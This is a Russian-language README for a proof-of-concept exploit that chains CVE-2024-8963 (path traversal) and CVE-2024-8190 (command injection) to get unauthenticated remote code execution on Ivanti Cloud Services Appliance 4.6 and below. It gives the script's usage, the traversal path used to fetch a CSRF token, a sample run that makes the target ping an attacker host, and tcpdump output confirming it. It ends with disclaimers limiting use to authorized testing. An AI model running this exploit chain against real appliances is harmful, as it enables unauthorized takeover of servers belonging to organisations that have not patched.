
Объединение CVE-2024-8963 и CVE-2024-8190 - Для неаутентифицированного удаленного выполнения кода на Ivanti CSA 4.6 и ниже
Объединение CVE-2024-8963 и CVE-2024-8190 — PoC для неаутентифицированного RCE на Ivanti CSA версии 4.6 и ниже.
CVE-2024-8963
Обход пути в Ivanti CSA до версии 4.6 Patch 519 позволяет удаленному неаутентифицированному атакующему получить доступ к ограниченной функциональности.
CVE-2024-8190
Уязвимость внедрения команд ОС в Ivanti Cloud Services Appliance версии 4.6 Patch 518 и ниже позволяет удаленному аутентифицированному атакующему выполнить удаленный код. Для эксплуатации этой уязвимости атакующий должен обладать привилегиями уровня администратора.
Данный PoC объединяет две уязвимости, демонстрируя, как CVE-2024-8190 может быть использована без аутентификации.
python3 ./cve-2024-8190.py <target_url> '<CMD>'
$ python3 ./cve-2024-8190.py https://<target> 'ping -c 4 <attacker>'
[!] ВНИМАНИЕ: Этот скрипт предназначен только для авторизованного тестирования и образовательных целей. Несанкционированное использование незаконно.
[*] Получение https://<target>/client/index.php%3F.php/gsb/datetime.php...
[+] Получено значение LDCSA_CSRF: sid:483045<УДАЛЕНО>
[*] Отправка полезной нагрузки...
[!] Время ожидания запроса истекло. Проверьте, выполнилась ли команда на цели.
$ sudo tcpdump -n "icmp" -l
11:43:15.135004 IP <target> > <attacker> ICMP echo request, id 30001, seq 1, length 64
11:43:16.135647 IP <target> > <attacker>: ICMP echo request, id 30001, seq 2, length 64
11:43:17.137707 IP <target> > <attacker>: ICMP echo request, id 30001, seq 3, length 64
11:43:18.137085 IP <target> > <attacker>: ICMP echo request, id 30001, seq 4, length 64
PoC от Horizon3.ai для CVE-2024-8190, на котором этот основан:
https://github.com/horizon3ai/CVE-2024-8190
Шаблон nuclei от ProjectDiscovery для CVE-2024-8963.yaml:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-8963.yaml
P.S. ProjectDiscovery — молодцы!
Не будьте мудаками.
Данное программное обеспечение создано исключительно для академических исследований и разработки эффективных защитных методов и не предназначено для атак на системы без явного разрешения. Авторы проекта не несут ответственности за неправомерное использование программы. Используйте ответственно.